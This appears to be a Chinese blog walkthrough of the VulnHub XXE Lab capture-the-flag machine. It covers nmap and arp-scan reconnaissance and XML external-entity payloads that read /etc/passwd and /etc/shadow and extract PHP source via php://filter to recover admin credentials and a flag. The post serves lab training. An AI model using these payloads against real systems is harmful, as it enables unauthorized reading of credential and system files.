VulnhubXXE

于 2024-07-30 21:56:05 发布
阅读量270 收藏 3
点赞数 14
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140807769
版权

kali ip:192.168.48.135

靶机IP:192.168.136

信息收集

主机发现

udo arp-scan -l

端口扫描

nmap -p- 192.168.48.136

nmap -p80,999 -sT -sC -sV 192.168.48.136

访问目录

目录扫描

访问

抓包处理

在客户端中抓包一下(kali也行)抓xxe

大概率存在XML实体注入

<?xml version = "1.0"?>
<!DOCTYPE a [<!ENTITY b "xxe">]>
<c>&b;</c>

查看一下账号

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]>
<root><name>&b;</name><password>asdadsad</password></root>

尝试读取/etc/shadow 密码进行暴力破解,发现没权限

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/shadow">]>
<root><name>&b;</name><password>asdadsad</password></root>

发现没权限

尝试获取xxe.php源码

<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-
encode/resource=xxe.php">]>

base64进行解码

发现解不开

访问 admin.php的文件 并且抓包

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">]>
<root><name>&b;</name><password>asdadsad</password></root>

base64进行解码

二次解码采用Magic自动解码

分析代码可得账号密码

密码MD5解码

administhebest
admin@123

找框登陆发现是xxe/admin/php

方法

可直接查看源代码(不推荐)

抓包

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

解码

提取出flag in{}解码

查看

<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-
encode/resource=/etc/.flag.php">]>

base64进行解码

放入php文件(php格式)

访问php文件

mouyu⇔
关注
  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5833
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
VulnHub XXE Lab: 1 WP
小小的花园里面挖呀挖呀~
08-31 9135
XXE(XML External Entity Injection) XML外部实体注入,XML是一种类似于HTML(超文本标记语言)的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XXE Lab: 1 下载地址:https://download.vulnhub.com/xxe/XXE.zip 扫描子网段发现靶机IP为:172.16.12.1.
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
vulnhubXXE靶机详解
天天学安全专属博客
03-20 732
vulnhubXXE靶机详解
[渗透测试学习靶机06] vulnhub 靶场 XXE Lab 1
weixin_47112073的博客
10-23 585
网上看到了好多xxe靶机通关的文章,但是没人写为什么可以实现文件读取,为什么是XXE漏洞,我在这里简单写一下,一来方便自己以后看,二来对还没有接触过xxe漏洞的朋友来说也比较友好
vulnhub靶场,XXE LAB: 1
kukudeshuo的博客
01-17 2436
vulnhub靶场,XXE LAB: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 攻击机:kali(192.168.109.128) 靶机:XXE LAB: 1(192.168.109.195) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:通过各种手段找到flag 信息收集 使用arp-scan-l确定目标靶机IP 确定目标靶机IP为192.168.109
Vulnhub-XXE靶机
djpcs2013的博客
06-10 452
1.主机发现 nmap -sS 192.168.74.1/24 就是192.168.74.158没错了,开放了80端口。 2.前期信息收集 访问192.168.74.158,就是apache默认页。 御剑扫目录。 访问robots.txt。存在/xxe/路径,admin.php。 ip/xxe为登录界面。 admin.php在/xxe/目录下。ip/xxe...
ThinkPHP对接易联云打印
qq_40088333的博客
07-24 333
ThinkPHP对接易联云打印
Unity发布安卓解决报错: You will no longer be able to disable R8
飞浪纪元FE的博客
07-24 334
更换U3D版本,也会更新后端编译的版本,弃用掉过时代码和警告。 后端:IL2CPP+.NetStandard 2.1。
堆的基本实现
zc331的博客
07-25 530
在提出堆的概念之前,首先要了解二叉树的基本概念一颗二叉树是节点的有限集合,该集合:1、或者为空;2、或者由一个根节点加上两颗分别称为左子树和右子树的两颗子树构成;堆就是一颗完全二叉树;堆有两种:小堆和大堆堆在内存上的存储是数组形式的(物理结构);我们认为想象成链式结构(逻辑结构)通过数组结构去实际存储,有这样的规律:每个父节点的下标乘以2加1就是左孩子节点,加2就是右孩子节点;无论是左孩子还是右孩子,其下标减去1再 /2 就是父节点的下标,这就是通过数组存储堆(完全二叉树)的优点。
Android --- ContentProvider 内容提供者
weixin_43244083的博客
07-24 622
ContentProvider 是 Android中用于数据共享的机制,主要是用于进程间(App之间)。
安卓音频权限申请适配安卓6-14
一粒程序米
07-25 353
安卓音频权限申请适配安卓6-14。
Android 开发中px、dpi 和 dp三个单位的介绍
netwalk的专栏
07-25 662
最小的显示单位,用于精确控制元素大小和位置。表示屏幕每英寸的像素数,用于适配不同密度的设备。建议使用的单位,可根据设备密度进行适配,用于定义布局大小和间距。在 Android 开发中,理解和正确使用这些单位是确保应用在不同设备上良好显示和用户体验的关键。
Android 列表或网格形式展示大量数据:RecyclerView
最新发布
qq_40853919的博客
07-25 937
RecyclerView.LayoutManager:是RecyclerView的布局管理器类,负责决定子项的排列方式。】这句代码的作用是在RecyclerView中添加一个自定义的装饰器,用于给列表项之间添加分割线,并指定分割线的宽度和方向。RecyclerView:是RecyclerView控件的核心类,用于展示和管理数据。reverseLayout这个参数在某些情况下很有用,比如当需要实现类似聊天界面的消息列表时,可以将reverseLayout设置为true,使得新的消息始终显示在列表的底部。
文件包涵条件竞争(ctfshow82)
m0_74402888的博客
07-24 592
添加cookie,清除参数。修改url地址,修改命令。
Android笔试面试题AI答之Android系统与综合类(1)
学无止境,止于至善
07-25 1024
答案仅供参考,来着文心一言、Kimi.ai。
Android SurfaceFlinger——GraphicBuffer获取内存信息(三十一)
小旭的专栏
07-24 2911
上一篇文章介绍了 GraphicBuffer 初始化的 initWithSize() 函数中的申请内存流程,这里我们看一下另一个比较重要的函数,GraphicBufferMapper. getTransportSize 获取内存信息。该函数通常在需要了解缓冲区的实际内存占用情况时调用,例如在调试内存使用情况或优化性能时。
Android 紧急电话号码规则
tq501501的博客
07-24 358
0724
[RK3588][Android12] Android->OTA包超过4个G导致打包失败
功成是不必在我,功成是必定有我。
07-24 492
Platform: RK3588 OS: Android12问题说明: 有的客户需要往系统中内置大量apk,这样就导致最终打包的OTA包超过4个G,从而导致打包OTA的时候报错:Zipfile size would require ZIP64 extensions 可能是python版本限制导致,比如:3588-12中默认python版本是2.7.12 需要切换到python3.xx 使用命令: update-alternatives --list python
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值